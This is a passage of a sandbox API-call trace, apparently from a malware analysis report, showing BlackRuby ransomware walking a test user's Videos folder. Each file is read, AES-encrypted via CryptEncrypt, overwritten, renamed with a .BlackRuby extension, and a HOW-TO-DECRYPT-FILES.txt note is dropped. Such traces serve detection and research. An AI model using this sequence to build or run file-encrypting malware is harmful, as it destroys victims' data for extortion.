CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d655a0*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1d655a0*, pdwDataLen=0x18ec48*=0x10) returned 1 [0062.977] GetLastError () returned 0x0 [0062.977] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d655d0*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1d655d0*, pdwDataLen=0x18ec50*=0x10) returned 1 [0062.977] GetLastError () returned 0x0 [0062.993] CryptDestroyKey (hKey=0x360de0) returned 1 [0062.993] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.993] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.993] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", lpFilePart=0x0) returned 0x5b [0062.993] GetLastError () returned 0x0 [0062.993] SetErrorMode (uMode=0x1) returned 0x0 [0062.993] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\yyvbulzrv9k cfd_.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.994] GetLastError () returned 0xb7 [0062.994] GetFileType (hFile=0x258) returned 0x1 [0062.994] SetErrorMode (uMode=0x0) returned 0x1 [0062.994] GetFileType (hFile=0x258) returned 0x1 [0062.994] WriteFile (in: hFile=0x258, lpBuffer=0x1b3d04c*, nNumberOfBytesToWrite=0xd080, lpNumberOfBytesWritten=0x18ec4c, lpOverlapped=0x0 | out: lpBuffer=0x1b3d04c*, lpNumberOfBytesWritten=0x18ec4c*=0xd080, lpOverlapped=0x0) returned 1 [0062.996] GetLastError () returned 0xb7 [0062.996] CloseHandle (hObject=0x258) returned 1 [0062.997] GetLastError () returned 0xb7 [0062.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", lpFilePart=0x0) returned 0x5b [0062.997] GetLastError () returned 0xb7 [0062.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_q6f64L43iNx7qWJX14qHEpDnzTgn44tFvtRAPZ5bhDkW.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_q6f64L43iNx7qWJX14qHEpDnzTgn44tFvtRAPZ5bhDkW.BlackRuby", lpFilePart=0x0) returned 0x87 [0062.997] GetLastError () returned 0xb7 [0062.997] SetErrorMode (uMode=0x1) returned 0x0 [0062.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\yyvbulzrv9k cfd_.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22589140, ftCreationTime.dwHighDateTime=0x1d351b0, ftLastAccessTime.dwLowDateTime=0xa2bb5c30, ftLastAccessTime.dwHighDateTime=0x1d350ef, ftLastWriteTime.dwLowDateTime=0x2dbf21a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xd080)) returned 1 [0062.997] GetLastError () returned 0xb7 [0062.997] SetErrorMode (uMode=0x0) returned 0x1 [0062.997] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\yyvbulzrv9k cfd_.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_q6f64L43iNx7qWJX14qHEpDnzTgn44tFvtRAPZ5bhDkW.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\encrypted_q6f64l43inx7qwjx14qhepdnztgn44tfvtrapz5bhdkw.blackruby")) returned 1 [0062.998] GetLastError () returned 0xb7 [0062.998] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5f [0062.998] GetLastError () returned 0xb7 [0062.998] SetErrorMode (uMode=0x1) returned 0x0 [0062.998] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.998] GetLastError () returned 0x5 [0063.000] SetErrorMode (uMode=0x0) returned 0x1 [0063.000] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX", lpFilePart=0x0) returned 0x45 [0063.000] GetLastError () returned 0x5 [0063.000] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0063.000] GetLastError () returned 0x5 [0063.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0063.000] GetLastError () returned 0x5 [0063.000] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX", lpFilePart=0x0) returned 0x45 [0063.000] GetLastError () returned 0x5 [0063.000] SetErrorMode (uMode=0x1) returned 0x0 [0063.000] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0063.000] GetLastError () returned 0x5 [0063.000] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.001] GetLastError () returned 0x5 [0063.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.001] GetLastError () returned 0x5 [0063.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.001] GetLastError () returned 0x5 [0063.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.001] GetLastError () returned 0x5 [0063.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.001] GetLastError () returned 0x5 [0063.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.001] GetLastError () returned 0x5 [0063.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.001] GetLastError () returned 0x5 [0063.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.001] GetLastError () returned 0x5 [0063.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0063.001] GetLastError () returned 0x12 [0063.001] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0063.002] SetErrorMode (uMode=0x0) returned 0x1 [0063.002] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX", lpFilePart=0x0) returned 0x45 [0063.002] GetLastError () returned 0x12 [0063.002] SetErrorMode (uMode=0x1) returned 0x0 [0063.002] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0063.002] GetLastError () returned 0x12 [0063.002] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.002] GetLastError () returned 0x12 [0063.002] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.002] GetLastError () returned 0x12 [0063.002] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.002] GetLastError () returned 0x12 [0063.002] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.002] GetLastError () returned 0x12 [0063.002] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.002] GetLastError () returned 0x12 [0063.002] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.002] GetLastError () returned 0x12 [0063.002] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.002] GetLastError () returned 0x12 [0063.003] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.003] GetLastError () returned 0x12 [0063.003] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0063.003] GetLastError () returned 0x12 [0063.003] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0063.003] SetErrorMode (uMode=0x0) returned 0x1 [0063.003] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", lpFilePart=0x0) returned 0x50 [0063.003] GetLastError () returned 0x12 [0063.003] SetErrorMode (uMode=0x1) returned 0x0 [0063.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\3-odum.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1b69720 | out: lpFileInformation=0x1b69720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251bfe60, ftCreationTime.dwHighDateTime=0x1d35900, ftLastAccessTime.dwLowDateTime=0x7263e2e0, ftLastAccessTime.dwHighDateTime=0x1d35708, ftLastWriteTime.dwLowDateTime=0x7263e2e0, ftLastWriteTime.dwHighDateTime=0x1d35708, nFileSizeHigh=0x0, nFileSizeLow=0xf21e)) returned 1 [0063.003] GetLastError () returned 0x12 [0063.003] SetErrorMode (uMode=0x0) returned 0x1 [0063.003] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", lpFilePart=0x0) returned 0x50 [0063.003] GetLastError () returned 0x12 [0063.004] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", lpFilePart=0x0) returned 0x50 [0063.004] GetLastError () returned 0x12 [0063.004] SetErrorMode (uMode=0x1) returned 0x0 [0063.004] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\3-odum.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.004] GetLastError () returned 0x0 [0063.004] GetFileType (hFile=0x258) returned 0x1 [0063.004] SetErrorMode (uMode=0x0) returned 0x1 [0063.004] GetFileType (hFile=0x258) returned 0x1 [0063.004] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0xf21e [0063.004] GetLastError () returned 0x0 [0063.004] ReadFile (in: hFile=0x258, lpBuffer=0x1b6b56c, nNumberOfBytesToRead=0xf21e, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1b6b56c*, lpNumberOfBytesRead=0x18ec40*=0xf21e, lpOverlapped=0x0) returned 1 [0063.005] GetLastError () returned 0x0 [0063.005] CloseHandle (hObject=0x258) returned 1 [0063.005] GetLastError () returned 0x0 [0063.005] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", lpFilePart=0x0) returned 0x50 [0063.005] GetLastError () returned 0x0 [0063.005] SetErrorMode (uMode=0x1) returned 0x0 [0063.005] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\3-odum.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251bfe60, ftCreationTime.dwHighDateTime=0x1d35900, ftLastAccessTime.dwLowDateTime=0x7263e2e0, ftLastAccessTime.dwHighDateTime=0x1d35708, ftLastWriteTime.dwLowDateTime=0x7263e2e0, ftLastWriteTime.dwHighDateTime=0x1d35708, nFileSizeHigh=0x0, nFileSizeLow=0xf21e)) returned 1 [0063.005] GetLastError () returned 0x0 [0063.005] SetErrorMode (uMode=0x0) returned 0x1 [0063.005] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c4e8) returned 1 [0063.005] GetLastError () returned 0x0 [0063.038] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1be3d94, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360ae0) returned 1 [0063.038] GetLastError () returned 0x0 [0063.038] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.038] GetLastError () returned 0x0 [0063.044] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.044] GetLastError () returned 0x0 [0063.044] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360aa0) returned 1 [0063.044] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.044] GetLastError () returned 0x0 [0063.044] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1c10de0*=0x1, dwFlags=0x0) returned 1 [0063.044] GetLastError () returned 0x0 [0063.044] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1c10dac, dwFlags=0x0) returned 1 [0063.044] GetLastError () returned 0x0 [0063.044] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c10e28*, pdwDataLen=0x18ec30*=0xf310, dwBufLen=0xf310 | out: pbData=0x1c10e28*, pdwDataLen=0x18ec30*=0xf310) returned 1 [0063.044] GetLastError () returned 0x0 [0063.044] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c2f474*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1c2f474*, pdwDataLen=0x18ec48*=0x10) returned 1 [0063.044] GetLastError () returned 0x0 [0063.044] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c2f4a4*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1c2f4a4*, pdwDataLen=0x18ec50*=0x10) returned 1 [0063.044] GetLastError () returned 0x0 [0063.045] CryptDestroyKey (hKey=0x360ae0) returned 1 [0063.045] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.045] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.045] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", lpFilePart=0x0) returned 0x50 [0063.045] GetLastError () returned 0x0 [0063.045] SetErrorMode (uMode=0x1) returned 0x0 [0063.045] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\3-odum.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.046] GetLastError () returned 0xb7 [0063.046] GetFileType (hFile=0x258) returned 0x1 [0063.046] SetErrorMode (uMode=0x0) returned 0x1 [0063.046] GetFileType (hFile=0x258) returned 0x1 [0063.048] CloseHandle (hObject=0x258) returned 1 [0063.048] GetLastError () returned 0xb7 [0063.048] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv", lpFilePart=0x0) returned 0x50 [0063.048] GetLastError () returned 0xb7 [0063.048] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_dwhJ9Odr31ePIPfH0K4WlmdPEtomuPH07IU7Rcl.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_dwhJ9Odr31ePIPfH0K4WlmdPEtomuPH07IU7Rcl.BlackRuby", lpFilePart=0x0) returned 0x81 [0063.048] GetLastError () returned 0xb7 [0063.048] SetErrorMode (uMode=0x1) returned 0x0 [0063.048] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\3-odum.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251bfe60, ftCreationTime.dwHighDateTime=0x1d35900, ftLastAccessTime.dwLowDateTime=0x7263e2e0, ftLastAccessTime.dwHighDateTime=0x1d35708, ftLastWriteTime.dwLowDateTime=0x2dc645c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xf320)) returned 1 [0063.048] GetLastError () returned 0xb7 [0063.048] SetErrorMode (uMode=0x0) returned 0x1 [0063.048] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\3-ODUM.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\3-odum.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_dwhJ9Odr31ePIPfH0K4WlmdPEtomuPH07IU7Rcl.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\encrypted_dwhj9odr31epipfh0k4wlmdpetomuph07iu7rcl.blackruby")) returned 1 [0063.049] GetLastError () returned 0xb7 [0063.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0063.049] GetLastError () returned 0xb7 [0063.049] SetErrorMode (uMode=0x1) returned 0x0 [0063.049] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.049] GetLastError () returned 0x0 [0063.050] GetFileType (hFile=0x258) returned 0x1 [0063.050] SetErrorMode (uMode=0x0) returned 0x1 [0063.050] GetFileType (hFile=0x258) returned 0x1 [0063.051] CloseHandle (hObject=0x258) returned 1 [0063.051] GetLastError () returned 0x0 [0063.051] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0063.051] GetLastError () returned 0x0 [0063.051] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0063.051] GetLastError () returned 0x0 [0063.051] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf", lpFilePart=0x0) returned 0x5d [0063.051] GetLastError () returned 0x0 [0063.051] SetErrorMode (uMode=0x1) returned 0x0 [0063.052] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\8x7wcqgy8saga0bmivt.swf"), fInfoLevelId=0x0, lpFileInformation=0x1c5b838 | out: lpFileInformation=0x1c5b838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b358f60, ftCreationTime.dwHighDateTime=0x1d34e0f, ftLastAccessTime.dwLowDateTime=0x4de48f40, ftLastAccessTime.dwHighDateTime=0x1d3580d, ftLastWriteTime.dwLowDateTime=0x4de48f40, ftLastWriteTime.dwHighDateTime=0x1d3580d, nFileSizeHigh=0x0, nFileSizeLow=0x694)) returned 1 